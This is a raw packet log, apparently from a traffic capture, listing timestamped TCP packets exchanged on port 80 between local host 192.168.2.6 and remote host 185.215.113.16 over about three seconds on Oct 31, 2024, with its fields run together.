                                                                            Oct 31, 2024 20:49:15.467641115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.467653990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.467729092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.484136105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.484178066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.484200954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.484210968 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.484273911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.484343052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.518184900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.518235922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.518354893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.568237066 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.586461067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.586483955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.586497068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.586555958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.603130102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603142977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603149891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603195906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603274107 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.603332996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603390932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603401899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.603442907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.603477001 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.690958977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.690994978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.691049099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.705741882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.705818892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.705833912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.705914021 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.722652912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722688913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722711086 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.722723961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722795963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722839117 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.722876072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722909927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722944021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.722948074 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.722975969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.723009109 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.766571999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.824296951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.824306965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.824522018 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.824841976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.824918985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.824982882 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.848612070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.848715067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.848752022 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.848766088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.848910093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.848965883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.848965883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.849004030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.849035978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.849064112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.849076986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.849087000 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.849117994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.944333076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.944379091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.944390059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.944428921 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.992428064 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992458105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992470026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992506981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.992669106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992681980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992692947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992706060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992722034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.992749929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.992903948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:15.992954969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:15.993011951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.036923885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.063256979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.063308001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.063325882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.063355923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.111291885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111325979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111339092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111344099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.111376047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.111427069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111438036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111476898 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.111555099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111650944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111663103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111691952 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.111788034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111800909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.111836910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.161925077 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.184742928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.184823036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.184834003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.184892893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.230253935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.230385065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.230396986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.230459929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.381356001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381704092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381716967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381728888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381774902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.381819963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.381839991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381851912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381864071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.381891966 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.382090092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382138968 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.382169008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382186890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382253885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382266045 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382276058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382287979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382297039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.382325888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.382524014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382536888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.382592916 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.382776976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.427643061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.469217062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.469230890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.469244003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.469290972 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.469291925 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.469304085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.469316006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.469356060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.619040012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619101048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619138002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619185925 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.619236946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619271040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619307041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619329929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.619364977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619412899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.619539022 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619579077 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.619610071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619621038 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.619837999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.707362890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.707376957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.707386971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.707427979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.708492041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.708511114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.708676100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.738886118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.738905907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.738967896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.826091051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.826224089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.826236010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.826313019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.857815027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.857867956 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.857882023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.857894897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.857934952 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.857970953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.911923885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:16.944781065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.944834948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.944847107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:16.944894075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.007474899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.007555008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.007600069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.007602930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.007612944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.007649899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.063532114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.063731909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.063745022 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.063776970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.115052938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.127015114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.127043962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.127058029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.127073050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.127095938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.127142906 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.182367086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.182426929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.182440996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.182468891 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.224410057 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.246793985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.246861935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.246875048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.246907949 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.247008085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.247021914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.247059107 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.286927938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.301373005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.301461935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.301476955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.301506042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.349430084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.365390062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.365421057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.365475893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.365482092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.365572929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.365586042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.365643024 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.365710974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.366802931 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.420231104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.420254946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.420269012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.420315027 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.484416008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.484477997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.484491110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.484529972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.484601974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.484612942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.484642982 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.536933899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.539117098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.539135933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.539150000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.539160967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.539174080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.539181948 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.539233923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.603288889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.603302956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.603338003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.603349924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.603372097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.603424072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.603426933 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.603444099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.603491068 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.657763958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.657824993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.657836914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.657907009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.722196102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.722251892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.722336054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.722387075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.722489119 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.722501040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.722542048 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.722599983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.724546909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.777869940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.778023958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.778038979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.778171062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.778182983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.778192043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.778239965 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.841599941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.841624975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.841638088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.841710091 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.841763020 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.841774940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.841844082 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.896476984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.896514893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.896528006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.896642923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.896660089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.896711111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.896924019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.960794926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.960851908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.960864067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.960911989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:17.961107969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.961119890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:17.961153984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.005718946 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.015475988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.015523911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.015537024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.015624046 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.015649080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.015769958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.016067982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.016134977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.016146898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.016230106 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.079464912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.079478025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.079489946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.079531908 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.079577923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.079608917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.079626083 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.130788088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.134324074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.134397030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.134408951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.134489059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.134553909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.134572983 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.134865046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.134922028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.134943962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.135009050 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.198846102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.198895931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.198909044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.198947906 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.199032068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.199043989 CET8049749185.215.113.16192.168.2.6
